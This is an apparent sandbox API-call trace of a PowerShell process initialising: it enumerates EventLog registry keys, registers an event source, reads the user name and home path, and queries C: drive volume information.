	[0416.191] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.191] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x360) returned 0x0
	[0416.191] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.192] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x364) returned 0x0
	[0416.192] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.192] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x368) returned 0x0
	[0416.192] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x36c) returned 0x0
	[0416.192] RegCloseKey (hKey=0x36c) returned 0x0
	[0416.192] RegCloseKey (hKey=0x344) returned 0x0
	[0416.193] RegCloseKey (hKey=0x368) returned 0x0
	[0416.193] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3e8 | out: phkResult=0x20d3e8*=0x368) returned 0x0
	[0416.193] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d35c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d358, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d35c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d358*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.193] CoTaskMemFree (pv=0x0) 
	[0416.193] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.193] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.194] CoTaskMemFree (pv=0x2ec760) 
	[0416.194] CoTaskMemFree (pv=0x0) 
	[0416.194] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.194] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.194] CoTaskMemFree (pv=0x2ec760) 
	[0416.194] CoTaskMemFree (pv=0x0) 
	[0416.194] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.194] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.194] CoTaskMemFree (pv=0x2ec760) 
	[0416.194] CoTaskMemFree (pv=0x0) 
	[0416.194] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.194] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.194] CoTaskMemFree (pv=0x2ec760) 
	[0416.194] CoTaskMemFree (pv=0x0) 
	[0416.194] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.194] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.194] CoTaskMemFree (pv=0x2ec760) 
	[0416.194] CoTaskMemFree (pv=0x0) 
	[0416.194] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.194] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.194] CoTaskMemFree (pv=0x2ec760) 
	[0416.194] CoTaskMemFree (pv=0x0) 
	[0416.194] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.195] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.195] CoTaskMemFree (pv=0x2ec760) 
	[0416.195] CoTaskMemFree (pv=0x0) 
	[0416.195] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.195] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.195] CoTaskMemFree (pv=0x2ec760) 
	[0416.195] CoTaskMemFree (pv=0x0) 
	[0416.195] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.195] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.195] CoTaskMemFree (pv=0x2ec760) 
	[0416.195] CoTaskMemFree (pv=0x0) 
	[0416.195] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x344) returned 0x0
	[0416.195] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.195] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x36c) returned 0x0
	[0416.195] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.195] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x370) returned 0x0
	[0416.195] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.196] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x374) returned 0x0
	[0416.196] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.196] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x378) returned 0x0
	[0416.196] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.196] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x37c) returned 0x0
	[0416.196] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.196] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x380) returned 0x0
	[0416.196] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.196] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x384) returned 0x0
	[0416.196] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.196] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x388) returned 0x0
	[0416.197] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x38c) returned 0x0
	[0416.197] RegCloseKey (hKey=0x38c) returned 0x0
	[0416.197] RegCloseKey (hKey=0x368) returned 0x0
	[0416.197] RegCloseKey (hKey=0x388) returned 0x0
	[0416.198] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x388) returned 0x0
	[0416.198] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d32c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d328, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d32c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d328*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.198] CoTaskMemFree (pv=0x0) 
	[0416.198] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.198] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x2ec760, lpcchName=0x20d3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.198] CoTaskMemFree (pv=0x2ec760) 
	[0416.198] CoTaskMemFree (pv=0x0) 
	[0416.198] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.198] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x2ec760, lpcchName=0x20d3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.198] CoTaskMemFree (pv=0x2ec760) 
	[0416.198] CoTaskMemFree (pv=0x0) 
	[0416.198] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.198] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x2ec760, lpcchName=0x20d3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.199] CoTaskMemFree (pv=0x2ec760) 
	[0416.199] CoTaskMemFree (pv=0x0) 
	[0416.199] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.199] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x2ec760, lpcchName=0x20d3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.199] CoTaskMemFree (pv=0x2ec760) 
	[0416.199] CoTaskMemFree (pv=0x0) 
	[0416.199] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.199] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x2ec760, lpcchName=0x20d3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.199] CoTaskMemFree (pv=0x2ec760) 
	[0416.199] CoTaskMemFree (pv=0x0) 
	[0416.199] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.199] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x2ec760, lpcchName=0x20d3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.199] CoTaskMemFree (pv=0x2ec760) 
	[0416.199] CoTaskMemFree (pv=0x0) 
	[0416.199] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.199] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x2ec760, lpcchName=0x20d3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.199] CoTaskMemFree (pv=0x2ec760) 
	[0416.199] CoTaskMemFree (pv=0x0) 
	[0416.199] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.199] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x2ec760, lpcchName=0x20d3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.199] CoTaskMemFree (pv=0x2ec760) 
	[0416.199] CoTaskMemFree (pv=0x0) 
	[0416.199] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.199] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x2ec760, lpcchName=0x20d3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.199] CoTaskMemFree (pv=0x2ec760) 
	[0416.199] CoTaskMemFree (pv=0x0) 
	[0416.200] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x368) returned 0x0
	[0416.200] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x0) returned 0x2
	[0416.200] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x38c) returned 0x0
	[0416.200] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x0) returned 0x2
	[0416.200] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x390) returned 0x0
	[0416.200] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x0) returned 0x2
	[0416.200] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x394) returned 0x0
	[0416.200] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x0) returned 0x2
	[0416.200] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x398) returned 0x0
	[0416.200] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x0) returned 0x2
	[0416.200] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x39c) returned 0x0
	[0416.201] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x0) returned 0x2
	[0416.201] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x3a0) returned 0x0
	[0416.201] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x0) returned 0x2
	[0416.201] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x3a4) returned 0x0
	[0416.201] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x0) returned 0x2
	[0416.201] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x3a8) returned 0x0
	[0416.201] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x3ac) returned 0x0
	[0416.201] RegCloseKey (hKey=0x3ac) returned 0x0
	[0416.201] RegCloseKey (hKey=0x388) returned 0x0
	[0416.202] RegCloseKey (hKey=0x3a8) returned 0x0
	[0416.208] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba90008
	[0416.557] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e2ee50*="WSMan", lpRawData=0x2e2ebc0) returned 1
	[0416.558] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0416.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.558] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0416.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.560] CoTaskMemAlloc (cb=0x804) returned 0x1b8c5130
	[0416.560] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8c5130, nSize=0x20d6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d6a8) returned 0x1
	[0416.560] CoTaskMemFree (pv=0x1b8c5130) 
	[0416.560] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.560] GetUserNameW (in: lpBuffer=0x2ec760, pcbBuffer=0x20d6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d6e8) returned 1
	[0416.561] CoTaskMemFree (pv=0x2ec760) 
	[0416.561] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e34388*="Alias", lpRawData=0x2e34118) returned 1
	[0416.562] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0416.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.562] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0416.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.564] CoTaskMemAlloc (cb=0x804) returned 0x1b8c5130
	[0416.564] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8c5130, nSize=0x20d6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d6a8) returned 0x1
	[0416.565] CoTaskMemFree (pv=0x1b8c5130) 
	[0416.565] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.565] GetUserNameW (in: lpBuffer=0x2ec760, pcbBuffer=0x20d6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d6e8) returned 1
	[0416.565] CoTaskMemFree (pv=0x2ec760) 
	[0416.565] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e39980*="Environment", lpRawData=0x2e39710) returned 1
	[0416.566] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0416.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.566] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0416.567] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0416.567] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0416.568] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0416.568] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0416.568] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0416.568] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0416.568] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x20d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0416.568] SetErrorMode (uMode=0x1) returned 0x1
	[0416.568] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x20d460 | out: lpFileInformation=0x20d460*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0416.568] SetErrorMode (uMode=0x1) returned 0x1
	[0416.569] GetLogicalDrives () returned 0x4
	[0416.570] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0416.571] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0416.571] SetErrorMode (uMode=0x1) returned 0x1
	[0416.572] CoTaskMemAlloc (cb=0x68) returned 0x2b9850
	[0416.572] CoTaskMemAlloc (cb=0x68) returned 0x2b97e0
	[0416.572] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b9850, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x20d430, lpMaximumComponentLength=0x20d42c, lpFileSystemFlags=0x20d428, lpFileSystemNameBuffer=0x2b97e0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20d430*=0x9c354b42, lpMaximumComponentLength=0x20d42c*=0xff, lpFileSystemFlags=0x20d428*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0416.572] CoTaskMemFree (pv=0x2b9850) 
	[0416.572] CoTaskMemFree (pv=0x2b97e0) 
	[0416.572] SetErrorMode (uMode=0x1) returned 0x1
	[0416.572] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0416.573] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d170, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0416.573] SetErrorMode (uMode=0x1) returned 0x1
